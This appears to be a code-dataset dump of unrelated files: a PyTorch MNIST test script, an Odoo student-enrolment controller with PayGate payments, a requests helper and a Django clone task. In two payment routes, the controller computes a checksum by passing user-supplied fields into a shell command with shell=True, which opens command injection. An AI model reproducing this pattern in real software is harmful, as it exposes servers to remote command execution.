runningLoss=runningLoss/len(trainLoader)\n# runningAcc=runningAcc/len(trainData)\n# trainLossPlot.append(runningLoss)\n# trainAccPlot.append(runningAcc)\n# print('Finish {} epoch, Loss: {:.6f}, Acc: {:.6f}'.format(epoch + 1, runningLoss,runningAcc))\n \n model.eval()\n evalLoss = 0\n evalAcc = 0\n cmPred=[]\n cmLabel=[]\n for data in testLoader:\n inputs, labels = data\n labels=labels.long()\n inputs=inputs.view(batchSize,1,28,28)\n inputs=inputs.to(DEVICE)\n labels=labels.to(DEVICE)\n \n outputs = model(inputs)\n loss = criterion(outputs, labels)\n \n evalLoss += loss.item()\n _, pred = torch.max(outputs, 1)\n \n temp=(pred.cpu().detach().numpy())\n cmPred=np.append(cmPred,temp)\n temp=(labels.cpu().detach().numpy())\n cmLabel=np.append(cmLabel,temp)\n \n numCorrect = (pred == labels).sum()\n evalAcc += numCorrect.item()\n \n evalAcc=evalAcc/len(testData)\n evalLoss=evalLoss/len(testLoader)\n lossPlot.append(evalLoss)\n accPlot.append(evalAcc)\n print('Eval Loss: {:.6f}, Acc: {:.6f}'.format(evalLoss,evalAcc))\n \n cm=confusion_matrix(cmPred, cmLabel)\n ax= plt.subplot()\n sns.heatmap(cm, annot=True, fmt='.20g', ax = ax)\n ax.set_xlabel('True labels');ax.set_ylabel('Predicted labels'); \n ax.set_title('Confusion Matrix'); \n plt.show()\n# if evalLoss<=lossMin:\n# lossMin=evalLoss\n# lossMinEpoch=epoch\n# elif epoch-lossMinEpoch>20:\n# break;\n# if evalLoss<=lossMin:\n# lossMin=evalLoss\n# else:\n# break\n#torch.save(model,'model_32_64_0.5_1')\n\n#outputData=pd.DataFrame(index=['lossPlot','accPlot','trainLossPlot','trainAccPlot'],data=[lossPlot,accPlot,trainLossPlot,trainAccPlot])\n#outputData.to_csv('data_16_32_100_std_drop0.8.csv', mode='a', header=False) \n#print (lossMin)\n#plt.plot (np.asarray(lossPlot),label='test loss')\n#plt.xlabel('epoch')\n#plt.ylabel('loss')\n#\n#plt.plot (np.asarray(trainLossPlot),label='Train loss')\n#plt.legend()\n#print ('Batch size=',batchSize)\n#print ('lr=',learningRate) \nfile.close()","sub_path":"project 1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"392381243","text":"# -*- coding: utf-8 -*-\nimport base64\n\nimport werkzeug\nimport logging\nfrom odoo import SUPERUSER_ID\nfrom odoo import http\nfrom odoo.http import request\nfrom datetime import datetime, time, date\nimport 
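# The confusion-matrix heatmap drawn during evaluation above, on fabricated labels
# so it runs without the model or a GPU -- a sketch; note the (pred, label) argument
# order matches the script, so rows are predictions rather than ground truth.
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.metrics import confusion_matrix

y_pred = np.array([0, 1, 0, 0, 1])
y_true = np.array([0, 1, 1, 0, 1])
cm = confusion_matrix(y_pred, y_true)
ax = plt.subplot()
sns.heatmap(cm, annot=True, fmt='d', ax=ax)
ax.set_xlabel('True labels'); ax.set_ylabel('Predicted labels')
ax.set_title('Confusion Matrix')
plt.show()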
json\nimport requests\nimport hashlib\nimport pycountry\nimport subprocess\nimport re\n\n\nclass OnlineEnrolment(http.Controller):\n global_vals = {}\n\n @http.route(['/enrolment', '/enrolment/home'], type='http', auth=\"public\", website=True)\n def enrolment_home(self, **post):\n self.global_vals = {}\n return request.render('swgc_enrolment.enrolment_home', {'global_vals': self.global_vals})\n\n @http.route(['/enrolment/welcome_career'], type='http', auth=\"public\", website=True)\n def enrolment_welcome_career(self, **post):\n return request.render('swgc_enrolment.enrolment_welcome_career')\n\n @http.route(['/enrolment/student_status'], type='http', auth=\"public\", methods=['POST', 'GET'], website=True,\n csrf=False)\n def student_status(self, **post):\n if request.httprequest.method == 'POST':\n vals = {}\n vals['student_status'] = request.httprequest.form.get('student_status')\n\n self.global_vals['student_status'] = post.get('student_status')\n request.session['global_vals'] = self.global_vals\n return request.redirect('/enrolment/registration')\n student_ids = request.env['res.partner'].search([])\n students = student_ids.read(['student_no'])\n student_numbers = []\n for student in students:\n st_no = str(student['student_no'])\n if st_no:\n student_numbers.append(st_no)\n return request.render('swgc_enrolment.enrolment_student_status',\n {'global_vals': self.global_vals, 'student_numbers': student_numbers})\n\n @http.route(['/enrolment/registration'], type='http', auth=\"public\", website=True, csrf=False)\n def registraion(self, **post):\n self.global_vals = request.session['global_vals']\n enrolment = False\n if post:\n orm_partner = request.env['res.partner']\n enrolment_pool = request.env['enrolment.enrolment']\n partner_id = orm_partner.search([('email', '=ilike', post.get('email'))])\n if not partner_id:\n stu_post = post\n stu_post.update({'name': post.get('first_name') + ' ' + post.get('last_name'), 'student': True})\n post['student_id'] = orm_partner.create(stu_post).id\n else:\n post['student_id'] = partner_id.id\n global_vals = self.global_vals\n campus = request.env['res.partner'].sudo().search_read([('name', 'ilike', 'TECHNISA CAMPUS')], limit=1)\n global_vals['student_id'] = post['student_id']\n global_vals['campus'] = campus[0] if campus else ''\n request.session['global_vals'] = self.global_vals\n post['student_status'] = global_vals['student_status']\n post['campus_id'] = campus[0].get('id') or False\n post.update({'online_enrol': True, 'campus': campus[0].get('id') or ''})\n if not request.session.get('enrolment_id'):\n enrolment_id = enrolment_pool.create(post)\n request.session['enrolment_id'] = enrolment_id.id\n request.session['enrolment_obj'] = enrolment_id.read([])\n return request.redirect('/enrolment/division')\n country = request.env['res.country']\n state = request.env['res.country.state']\n ethnic = request.env['student.ethnic']\n disability = request.env['student.disability']\n title = request.env['res.partner.title']\n\n country_ids = country.search([])\n country_list = country.browse(country_ids.ids)\n\n state_ids = state.search([])\n state_read = state_ids.read(['name', 'country_id'])\n state_list = state.browse(state_ids.ids)\n\n ethnic_ids = ethnic.search([])\n ethnic_list = ethnic.browse(ethnic_ids.ids)\n\n disability_ids = disability.search([])\n disability_list = disability.browse(disability_ids.ids)\n\n title_ids = title.search([])\n title_list = title.browse(title_ids.ids)\n\n return request.render('swgc_enrolment.enrolment_registration',\n 
{'enrolment': enrolment, 'country_list': country_list, 'state_list': state_list,\n 'ethnic_list': ethnic_list, 'disability_list': disability_list,\n 'title_list': title_list, 'global_vals': self.global_vals})\n\n # @http.route(['/enrolment/campus'], type='http', auth=\"public\", website=True)\n # def campus(self, **post):\n # self.global_vals = request.session['global_vals']\n # campus = request.env['res.partner']\n # if request.httprequest.method == 'POST':\n # campus_id = post.get('campus') and int(post.get('campus'))\n # campus_id = campus.browse([campus_id])\n # self.global_vals['campus'] = campus_id.read()[0]\n # request.session['global_vals'] = self.global_vals\n # enrolment_id = request.session['enrolment_id']\n # request.env['enrolment.enrolment'].browse([enrolment_id]).write({'campus': campus_id.id})\n # # return request.redirect('/enrolment/division')\n # return request.redirect('/enrolment/qualification')\n # campus_ids = campus.search([('campus', '=', 'True'), ('view_type', '=', 'campus')])\n #\n # return request.render('swgc_enrolment.enrolment_campus',\n # {'campuses': campus_ids, 'global_vals': self.global_vals})\n\n @http.route(['/enrolment/division'], type='http', auth=\"public\", website=True)\n def division(self, **post):\n self.global_vals = request.session['global_vals']\n division = request.env['division'].sudo()\n if request.httprequest.method == 'POST':\n division_id = post.get('division_id') and int(post.get('division_id'))\n enrolment_id = request.session['enrolment_id']\n enrolment_id = request.env['enrolment.enrolment'].browse([enrolment_id])\n enrolment_id.write({'division_id': division_id})\n division_id = request.env['division'].browse([division_id])\n self.global_vals['division_id'] = division_id.read()[0]\n request.session['global_vals'] = self.global_vals\n return request.redirect('/enrolment/qualification')\n quals = []\n if self.global_vals['campus']:\n qual_ids = request.env['course.programme'].search([])\n campus_id = self.global_vals['campus']['id']\n for obj in qual_ids:\n if campus_id in obj.campus_ids.ids:\n quals.append(obj.division_id)\n quals = set(quals)\n division_ids = division.search([])\n return request.render('swgc_enrolment.enrolment_division',\n {'divisions': division_ids, 'quals': quals, 'global_vals': self.global_vals})\n\n @http.route(['/enrolment/qualification'], type='http', auth=\"public\", website=True)\n def qualification(self, **post):\n self.global_vals = request.session['global_vals']\n course_programme = request.env['course.programme']\n if request.httprequest.method == 'POST':\n programme_id = request.httprequest.form.get('course_programme') and int(\n request.httprequest.form.get('course_programme')) or False\n enrolment_id = request.session['enrolment_id']\n course_programme = request.env['course.programme'].browse([programme_id])\n enrolment_id = request.env['enrolment.enrolment'].browse([enrolment_id])\n enrolment_id.write({'course_programme': programme_id, 'level_id': course_programme.course_level_id.id})\n self.global_vals['level_id'] = course_programme.course_level_id.read()[0]\n self.global_vals['course_programme'] = course_programme.read()[0]\n request.session['global_vals'] = self.global_vals\n return request.redirect('/enrolment/subjects')\n campus_id = self.global_vals.get('campus')['id']\n programme_ids = course_programme.search([('active', '=', True), ('online_enrolment', '=', True)])\n self.global_vals['programme_ids'] = programme_ids.ids\n request.session['global_vals'] = self.global_vals\n return 
request.render('swgc_enrolment.enrolment_qualification',\n {'programmes': programme_ids.read(), 'global_vals': self.global_vals})\n\n # @http.route(['/enrolment/level'], type='http', auth=\"public\", website=True)\n # def level(self, **post):\n # self.global_vals = request.session['global_vals']\n # course_level = request.env['course.level']\n # if request.httprequest.method == 'POST':\n # level_id = post.get('level_id') and int(post.get('level_id'))\n # enrolment_id = request.session['enrolment_id']\n # enrolment_id = request.env['enrolment.enrolment'].browse([enrolment_id])\n # enrolment_id.write({'level_id': level_id})\n # level_id = course_level.browse([level_id])\n # self.global_vals['level_id'] = level_id.read()[0]\n # request.session['global_vals'] = self.global_vals\n # return request.redirect('/enrolment/subjects')\n # level_ids = course_level.search([])\n # return request.render('swgc_enrolment.enrolment_course_level',\n # {'levels': level_ids.read(), 'global_vals': self.global_vals})\n\n @http.route(['/enrolment/subjects'], type='http', auth=\"public\", website=True)\n def subjects(self, **post):\n self.global_vals = request.session['global_vals']\n if request.httprequest.method == 'POST':\n product_ids = []\n if request.httprequest.form:\n product_ids.extend([int(key) for key in post.keys()])\n self.global_vals['product_ids'] = product_ids\n self.global_vals['subject_names'] = request.env['product.product'].browse(product_ids).read()\n enrolment_id = request.session['enrolment_id']\n request.env['enrolment.enrolment'].browse([enrolment_id]).write({'subject_ids': [(6, 0, product_ids)]})\n request.session['global_vals'] = self.global_vals\n return request.redirect('/enrolment/semester')\n programme_ids = request.env['enrolment.enrolment'].browse([request.session['enrolment_id']])\n compulsory_subjects, optional_subjects = None, None\n for programme in programme_ids.course_programme:\n compulsory_subjects = programme.compulsory_subject_lines\n compulsory_subjects = [subject for subject in compulsory_subjects]\n optional_subjects = programme.optional_subject_lines\n optional_subjects = [subject for subject in optional_subjects if\n subject.course_level.id == self.global_vals['level_id']['id']]\n return request.render('swgc_enrolment.enrolment_subjects', {'compulsory_subjects': compulsory_subjects,\n 'optional_subjects': optional_subjects,\n 'global_vals': self.global_vals})\n\n @http.route(['/enrolment/semester'], type='http', auth=\"public\", website=True)\n def semester(self, **post):\n self.global_vals = request.session['global_vals']\n if post:\n semester_id = post.get('semester_id') and int(post.get('semester_id')) or False\n self.global_vals['semester_id'] = request.env['semester'].browse([semester_id]).read()[0]\n year_id = post.get('year_id') and int(post.get('year_id')) or False\n self.global_vals['year_id'] = request.env['course.year'].browse([year_id]).read()[0]\n request.session['global_vals'] = self.global_vals\n\n global_vals = self.global_vals\n orm_partner = request.env['res.partner']\n orm_sale = request.env['sale.order']\n partner = orm_partner.browse(global_vals['student_id'])\n post['student_status'] = global_vals['student_status']\n post['campus'] = global_vals['campus']['id']\n post['division_id'] = global_vals['division_id']['id']\n post['course_programme'] = global_vals['course_programme']['id']\n post['subject_ids'] = [(6, 0, global_vals['product_ids'])]\n post['level_id'] = global_vals['level_id']['id']\n post['year_id'] = global_vals['year_id']['id']\n 
post['semester_id'] = global_vals['semester_id']['id']\n post['mobile'] = str(partner.mobile)\n\n enrolment_id = request.session.get('enrolment_id')\n enrolment = request.env['enrolment.enrolment'].browse(enrolment_id)\n enrolment.write({'year_id': post.get('year_id'),\n 'semester_id': post.get('semester_id')})\n\n if partner:\n partner.write({'year_id': post.get('year_id'),\n 'semester_id': post.get('semester_id')})\n\n sale_order_vals = {\n 'partner_id': global_vals['student_id'],\n 'state': 'draft',\n 'partner_invoice_id': global_vals['student_id'],\n 'partner_shipping_id': global_vals['student_id'],\n 'picking_policy': 'direct',\n 'order_policy': 'manual',\n 'pricelist_id': 1,\n }\n sale_order_id = orm_sale.create(sale_order_vals)\n quote_name = \"SO{0}ENR\".format(str(sale_order_id.id).zfill(3))\n order_line_vals = [(0, 0, {'product_id': product.id, 'name': product.name, 'product_uom_qty': 1,\n 'price_unit': product.lst_price, 'tax_id': [(6, 0, product.taxes_id.ids)],\n 'order_id': sale_order_id.id}) for product in enrolment.subject_ids]\n request.session['sale_order_id'] = sale_order_id.id\n sale_order_id.write({'name': quote_name, 'order_line': order_line_vals})\n request.session['global_vals'] = self.global_vals\n return request.redirect('/enrolment/payment')\n course_year = request.env['course.year']\n semester = request.env['semester']\n current_year = datetime.now().year\n year_ids = course_year.search([('name', 'in', [str(current_year), str(current_year + 1)])])\n semester_ids = semester.search([])\n return request.render('swgc_enrolment.enrolment_semester',\n {'year_list': year_ids, 'semester_list': semester_ids,\n 'global_vals': self.global_vals})\n\n @http.route(['/enrolment/payment'], type='http', auth=\"public\", website=True, csrf=False)\n def payment(self, **post):\n if post:\n return request.redirect('/enrolment/registration_details')\n orm_sale = request.env['sale.order']\n sale_order_id = request.session.get('sale_order_id')\n sale_order = False\n total = 0.0\n if sale_order_id:\n sale_order = orm_sale.browse([sale_order_id])\n total = sale_order.amount_total\n enrolment_id = request.session['enrolment_id']\n enrolment = request.env['enrolment.enrolment'].browse([enrolment_id])\n self.global_vals = request.session['global_vals']\n query_response = request.session.get('paygate_trasn_response')\n response_error = False\n if query_response:\n response_error = query_response.get('RESULT_DESC')\n request.session['paygate_trasn_response'] = False\n\n acquirer_id = request.env['payment.acquirer'].sudo().search([('provider', '=', 'paygate')], limit=1)\n url = acquirer_id.paygate_url + '/initiate.trans'\n country_code = str(sale_order.partner_id.country_id.code)\n if country_code:\n try:\n country = pycountry.countries.get(alpha2=country_code.upper()).alpha3.encode('ascii', 'ignore')\n except Exception as e:\n country = pycountry.countries.get(alpha_2=country_code.upper()).alpha_3.encode('ascii', 'ignore')\n else:\n country = 'ZAF'\n currency = sale_order.currency_id.name\n ref = sale_order.name\n amount = int(float(sale_order.amount_total) * 100)\n email = sale_order.partner_id.email\n values = {\n 'PAYGATE_ID': acquirer_id.paygate_id,\n 'REFERENCE': ref,\n 'AMOUNT': amount,\n 'CURRENCY': currency,\n 'RETURN_URL': '%senrolment/payment_success_paygate' % (http.request.httprequest.host_url),\n 'TRANSACTION_DATE': str(datetime.now().date()),\n 'LOCALE': 'en',\n 'COUNTRY': country,\n 'EMAIL': email,\n }\n checksum = \"%s%s%s%s%s%s%s%s%s%s\" % (\n acquirer_id.paygate_id, ref, 
str(amount), currency,\n '%senrolment/payment_success_paygate' % (http.request.httprequest.host_url),\n str(datetime.now().date()), 'en',\n country.decode(\"utf-8\"), email, acquirer_id.paygate_key)\n checksum = subprocess.check_output(\"echo -n %s | md5sum\" % checksum, shell=True)\n checksum = (checksum.decode(\"utf-8\")).split(\"-\")[0].strip()\n values.update({\n 'CHECKSUM': checksum\n })\n sale_order = request.env['sale.order'].sudo().search(\n [('name', '=', ref)])\n init_tras = requests.post(url=url, data=values)\n response = dict(x.split('=') for x in init_tras.text.split('&'))\n request.session['paygate_response'] = response\n values = {'global_vals': self.global_vals, 'sale_order': sale_order, 'total': total,\n 'enrolment': enrolment, 'response': response_error}\n if response.get('PAY_REQUEST_ID'):\n values.update({\n 'pay_request_id': response.get('PAY_REQUEST_ID'),\n 'checksum': response.get('CHECKSUM'),\n 'ref': ref,\n 'amount': amount,\n 'url': acquirer_id.paygate_url + '/process.trans'\n })\n return request.render('swgc_enrolment.paygate_com', values)\n\n @http.route('/enrolment/payment_success_paygate', type='http', auth='none', website=True, csrf=False)\n def response_back_paygate(self, **post):\n response = request.session.get('paygate_response')\n acquirer_id = request.env['payment.acquirer'].sudo().search([('provider', '=', 'paygate')], limit=1)\n url = acquirer_id.paygate_url + '/query.trans'\n data = {\n 'PAYGATE_ID': response.get('PAYGATE_ID'),\n 'PAY_REQUEST_ID': post.get('PAY_REQUEST_ID'),\n 'REFERENCE': response.get('REFERENCE'),\n 'CHECKSUM': response.get('CHECKSUM')\n }\n query_tras = requests.post(url=url, data=data)\n query_response = dict(x.split('=') for x in query_tras.text.split('&'))\n sale_order = request.env['sale.order'].sudo().search(\n [('name', '=', response.get('REFERENCE'))])\n data = {\n 'reference': response.get('REFERENCE'),\n 'amount': sale_order.amount_total,\n 'trans_id': query_response.get('TRANSACTION_ID'),\n 'result_code': query_response.get('RESULT_CODE'),\n 'trans_status': query_response.get('TRANSACTION_STATUS')\n }\n if query_response.get('RESULT_CODE') == '990017' and query_response.get('TRANSACTION_STATUS') == '1':\n payment_tx_id = request.env['payment.transaction'].sudo().create({\n 'reference': sale_order.name,\n 'sale_order_ids': [(4, sale_order.id)],\n 'amount': sale_order.amount_total,\n 'currency_id': sale_order.currency_id.id,\n 'acquirer_id': acquirer_id.id,\n 'partner_country_id': sale_order.partner_id.country_id.id,\n 'state': 'draft',\n 'type': 'validation',\n })\n redirect_url = \"/enrolment/payment_success\"\n request.env['payment.transaction'].form_feedback(data, 'paygate')\n self.paygate_autopay(sale_order.name)\n else:\n request.session['paygate_trasn_response'] = query_response\n redirect_url = \"/enrolment/payment\"\n return werkzeug.utils.redirect(redirect_url)\n\n @http.route(['/enrolment/payment_success'], type='http', auth=\"public\", website=True)\n def payment_success(self, **post):\n cr = request.cr\n self.global_vals = request.session['global_vals']\n if request.httprequest.method == 'POST':\n return request.redirect('/enrolment/registration_details')\n enrolment_id = request.session['enrolment_id']\n enrolment = request.env['enrolment.enrolment'].browse([enrolment_id])\n total = 0.0\n if enrolment:\n for subject in enrolment.subject_ids:\n total += subject.lst_price\n return request.render('swgc_enrolment.enrolment_payment_success',\n {'enrolment': enrolment, 'global_vals': self.global_vals, 'total': 
total})\n\n    @http.route(['/enrolment/payment_unsuccess'], type='http', auth=\"public\", website=True)\n    def payment_unsuccess(self, **post):\n        cr = request.cr\n        if request.httprequest.method == 'POST':\n            return request.redirect('/enrolment/payment')\n        self.global_vals = request.session['global_vals']\n        enrolment_id = request.session['enrolment_id']\n        enrolment = request.env['enrolment.enrolment'].sudo().browse([enrolment_id])\n        total = 0.0\n        if enrolment:\n            for subject in enrolment.subject_ids:\n                total += subject.lst_price\n        return request.render('swgc_enrolment.enrolment_payment_unsuccess',\n                              {'enrolment': enrolment, 'global_vals': self.global_vals, 'total': total})\n\n    @http.route(['/enrolment/registration_details'], type='http', auth=\"public\", website=True, csrf=False)\n    def registration_details(self, **post):\n        self.global_vals = request.session['global_vals']\n        enrolment = False\n        global_vals = self.global_vals\n        if post:\n            orm_partner = request.env['res.partner']\n            enrolment_pool = request.env['enrolment.enrolment']\n            global_vals = self.global_vals\n            partner_id = request.env['res.partner'].sudo().browse([global_vals['student_id']])\n            enrolment_id = request.env['enrolment.enrolment'].sudo().browse([request.session.get('enrolment_id')])\n            post['state_id'] = post.get('state_id_new')\n            partner_id.write(post)\n            enrolment_id.write(post)\n            return request.redirect('/enrolment/upload_docs')\n        country = request.env['res.country']\n        state = request.env['res.country.state']\n        ethnic = request.env['student.ethnic']\n        disability = request.env['student.disability']\n        title = request.env['res.partner.title']\n\n        country_ids = country.search([])\n        country_list = country.browse(country_ids.ids)\n\n        state_ids = state.search([])\n        state_read = state_ids.read(['name', 'country_id'])\n        state_list = state.browse(state_ids.ids)\n\n        ethnic_ids = ethnic.search([])\n        ethnic_list = ethnic.browse(ethnic_ids.ids)\n\n        disability_ids = disability.search([])\n        disability_list = disability.browse(disability_ids.ids)\n\n        title_ids = title.search([])\n        title_list = title.browse(title_ids.ids)\n\n        return request.render('swgc_enrolment.enrolment_registration_details',\n                              {'enrolment': enrolment, 'country_list': country_list, 'state_list': state_list,\n                               'ethnic_list': ethnic_list, 'disability_list': disability_list,\n                               'title_list': title_list, 'global_vals': self.global_vals})\n\n    @http.route(['/enrolment/upload_docs'], type='http', auth=\"public\", website=True)\n    def upload_docs(self, **post):\n        self.global_vals = request.session['global_vals']\n        enrolment = False\n        enrolment_id = request.session.get('enrolment_id')\n        if enrolment_id: enrolment = request.env['enrolment.enrolment'].browse([enrolment_id])\n        return request.render('swgc_enrolment.enrolment_upload_docs', {'enrolment': enrolment})\n\n    @http.route(['/enrolment/submit_docs'], type='http', auth=\"public\", website=True)\n    def submit_docs(self, **post):\n        self.global_vals = request.session['global_vals']\n        if request.httprequest.method == 'POST':\n            if request.session.get('enrolment_id'):\n                vals = {}\n                enrolment_id = request.session.get('enrolment_id')\n                document_type = request.env['document.type']\n                doc_vals = []\n                for filetype, content in post.items():\n                    fp = post.get(filetype)\n                    if fp:\n                        datas = fp.read()\n                        documenttype = document_type.search([('name', '=ilike', filetype)])\n                        doc_vals.append((0, 0, {'name': fp.filename, 'type': 'binary', 'datas': base64.b64encode(datas),\n                                                'datas_fname': fp.filename, 'documenttype': [(6, 0, documenttype.ids)]}))\n                
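# x2many command tuples: each (0, 0, vals) creates a new attached document, while (6, 0, ids) links the matching document.type records\n                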
vals['document_ids'] = doc_vals\n                enrolment = request.env['enrolment.enrolment'].browse([enrolment_id])\n                enrolment.write(vals)\n                global_vals = self.global_vals\n                student_id = global_vals.get('student_id')\n            else:\n                return request.redirect('/enrolment/')\n        return request.redirect('/enrolment/upload_docs')\n\n    @http.route(['/enrolment/confirmation'], type='http', auth=\"public\", website=True)\n    def confirmation(self, **post):\n        self.global_vals = request.session['global_vals']\n        enrolment_id = request.session.get('enrolment_id')\n        if request.httprequest.method == 'POST':\n            if enrolment_id:\n                enrolment = request.env['enrolment.enrolment'].browse([enrolment_id])\n                enrolment.write({'complete_enrolment': True})\n                enrolment.send_sms()\n                return request.redirect('/enrolment/enrolment_success')\n        if enrolment_id:\n            enrolment = request.env['enrolment.enrolment'].browse([enrolment_id])\n        total = 0.0\n        for subject in enrolment.subject_ids:\n            total += subject.lst_price\n        return request.render('swgc_enrolment.enrolment_confirmation',\n                              {'enrolment': enrolment, 'total': total, 'global_vals': self.global_vals})\n\n    @http.route(['/enrolment/enrolment_success'], type='http', auth=\"public\", website=True)\n    def success(self, **post):\n        enrolment_id = request.session['enrolment_id']\n        cr = request.cr\n        orm_template = request.env['mail.template']\n        template_id = orm_template.search([('name', '=ilike', 'Enrolment Confirmation')], limit=1)\n        if template_id:\n            template_id.send_mail(enrolment_id)\n        try:\n            self.global_vals = {}\n            del (request.session['sale_order_id'])\n            del (request.session['enrolment_id'])\n        except Exception as e:\n            logging.debug(request.session)\n            logging.error('----------------Got Exception in session clear---------------------%s' % e)\n        return request.render('swgc_enrolment.enrolment_success')\n\n    @http.route(['/enrolment/report'], type='http', auth=\"public\", website=True)\n    def report(self, **post):\n        return request.render('swgc_enrolment.report_enrolment_pdf')\n\n    @http.route(['/country/select'], type='http', auth=\"public\", website=True, csrf=False)\n    def country_select(self, **post):\n        stateObj = request.env['res.country.state'].sudo()\n        country_id = int(post.get('country_id'))\n        state_ids = stateObj.search([('country_id', '=', country_id)])\n        state_lis = []\n        for state in state_ids:\n            # build one <option> element per state for the country's state dropdown\n            state_lis.append('''<option value=\"%s\">%s</option>''' % (state.id, state.name))\n        if len(state_lis):\n            return json.dumps({'flag': 1, 'state_lis': state_lis})\n        else:\n            return json.dumps({'flag': 2, 'state_lis': state_lis})\n\n    # PayGate methods\n\n    @http.route('/enrolment/redirect_paygate', type='http', auth='none', methods=['POST'], csrf=False, website=True)\n    def redirect_paygate(self, **post):\n        acquirer_id = request.env['payment.acquirer'].sudo().search([('provider', '=', 'paygate')], limit=1)\n        url = acquirer_id.paygate_url + '/initiate.trans'\n        country = pycountry.countries.get(alpha_2=(post.get('country')).upper())\n        currency = post.get('currency').encode('ascii', 'ignore')\n        ref = post.get('ref').encode('ascii', 'ignore')\n        amount = int(float(post.get('amount').encode('ascii', 'ignore')) * 100)\n        email = post.get('email').encode('ascii', 'ignore')\n        values = {\n            'PAYGATE_ID': acquirer_id.paygate_id.encode('ascii', 'ignore'),\n            'REFERENCE': ref,\n            'AMOUNT': amount,\n            'CURRENCY': currency,\n            'RETURN_URL': '%senrolment/payment_success_paygate' % (http.request.httprequest.host_url),\n            'TRANSACTION_DATE': str(datetime.now().date()),\n            'LOCALE': 'en',\n            'COUNTRY': country.alpha_3.encode('ascii', 'ignore'),\n            'EMAIL': email,\n        }\n        
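# PayGate CHECKSUM: MD5 digest of the request fields concatenated in order, with the secret paygate_key appended\n        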
checksum = \"%s%s%s%s%s%s%s%s%s%s\" % (\n acquirer_id.paygate_id, ref.decode(\"utf-8\"), str(amount), currency.decode(\"utf-8\"),\n '%senrolment/payment_success_paygate' % (http.request.httprequest.host_url),\n str(datetime.now().date()), 'en',\n country.alpha_3.encode('ascii', 'ignore').decode(\"utf-8\"), email.decode(\"utf-8\"), acquirer_id.paygate_key)\n checksum = subprocess.check_output(\"echo -n %s | md5sum\" % checksum, shell=True)\n checksum = (checksum.decode(\"utf-8\")).split(\"-\")[0].strip()\n values.update({\n 'CHECKSUM': checksum\n })\n sale_order = request.env['sale.order'].sudo().search(\n [('name', '=', post.get('ref').encode('ascii', 'ignore'))])\n init_tras = requests.post(url=url, data=values)\n response = dict(x.split('=') for x in init_tras.text.split('&'))\n request.session['paygate_response'] = response\n if response.get('PAY_REQUEST_ID'):\n render_value = {\n 'pay_request_id': response.get('PAY_REQUEST_ID'),\n 'checksum': response.get('CHECKSUM'),\n 'ref': ref,\n 'amount': amount,\n 'url': acquirer_id.paygate_url + '/process.trans'\n }\n return request.render('swgc_enrolment.confirm_payment_page_new', render_value)\n else:\n return werkzeug.utils.redirect('/enrolment/payment')\n\n def paygate_autopay(self, order):\n sale_order = request.env['sale.order'].sudo()\n account_invoice = request.env['account.invoice'].sudo()\n order_id = sale_order.search([('name', '=', order)])\n if order_id:\n order_id.action_confirm()\n inv_id = order_id.action_invoice_create()\n if inv_id:\n self.invoice_paid(inv_id[0], order_id.id)\n else:\n invoice_id = account_invoice.search([('number', '=', order)])\n if invoice_id:\n self.invoice_paid(invoice_id.id, order_id.id)\n return True\n\n def invoice_paid(self, inv_id, order):\n account_invoice = request.env['account.invoice'].sudo()\n account_voucher = request.env['account.payment'].sudo()\n if inv_id:\n inv = account_invoice.browse([inv_id])\n order = request.env['sale.order'].sudo().browse([order])\n inv.compute_taxes()\n if inv:\n order._get_invoiced()\n inv.action_invoice_open()\n payment = request.env['account.payment'].sudo().create({\n 'payment_type': 'inbound',\n 'payment_transaction_id': order.transaction_ids[0].id,\n 'partner_id': inv.partner_id.id,\n 'partner_type': 'customer',\n 'amount': float(inv.amount_total),\n 'journal_id': order.transaction_ids[0].acquirer_id.journal_id.id,\n 'payment_method_id': order.transaction_ids[0].acquirer_id.journal_id.inbound_payment_method_ids.id\n })\n payment.post()\n data = json.loads(inv.outstanding_credits_debits_widget)\n for each in data.get('content'):\n inv.assign_outstanding_credit(each.get('id'))\n order.sudo().action_confirm()\n for line in order.order_line:\n line.write({\n 'qty_invoiced': line.product_uom_qty\n })\n return True\n","sub_path":"swgc_enrolment/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":33195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636620522","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\n\nfrom dps_utils.misc import retry\n\n\ndef assert_ok(r, raw=False):\n if not isinstance(r, requests.models.Response):\n raise TypeError('Expected , <%s> provided.' % type(r))\n\n if not r.ok:\n raise requests.HTTPError('HTTP error. URL: %s. Status code: %d. 
Body:\\n%s' % (\n r.url, r.status_code, r.text), response=r)\n\n return r.content if raw else r.text\n\n\ndef json_decode(r):\n try:\n response = r.json()\n except ValueError:\n assert_ok(r)\n raise ValueError('JSON decode error. URL: %s. Body:\\n%s' % (r.url, r.text))\n\n if isinstance(response, dict) and response.get('error_code', response.get('is_err')):\n raise requests.HTTPError('API got an error. Message: %s' % response.get(\n 'message', response.get('msg', 'Unknown Error')), response=r)\n\n assert_ok(r)\n return response\n\n\n@retry(2, 'Request failed.', False)\ndef request(url, method='POST', timeout=(2, 8), **kwargs):\n decode_json = kwargs.pop('decode_json', True)\n r = requests.request(method, url, timeout=timeout, **kwargs)\n if decode_json:\n return json_decode(r)\n return assert_ok(r)\n\n\n@retry(3, 'Download failed.', False)\ndef download(url, timeout=(3, 10)):\n r = requests.get(url, timeout=timeout)\n return assert_ok(r, True)\n","sub_path":"dps_utils/curl.py","file_name":"curl.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"84142540","text":"import logging\r\n\r\nfrom django.contrib.auth import get_user_model\r\nfrom django.core.mail import EmailMessage\r\nfrom django.db import transaction\r\nfrom django.template.loader import get_template\r\nfrom dramatiq import actor\r\n\r\nfrom api.collate.utils.merge_clone import create_validation, copy_results, MODE\r\nfrom api.models import JobStatus, Validation, CloneJob\r\nfrom reporting.site_settings import production\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\n@actor\r\n@transaction.atomic\r\ndef do_clone(job_id: int, validation_id: int):\r\n try:\r\n job = CloneJob.objects.get(pk=job_id)\r\n log.debug('Started clone task with id: %d, username: %s', job_id, job.requester.username)\r\n\r\n # Create new validation\r\n validation = create_validation(job, [validation_id], MODE.CLONE)\r\n\r\n # Flat copy results from validation list\r\n copy_results(validation, [validation_id], None)\r\n\r\n job.status = 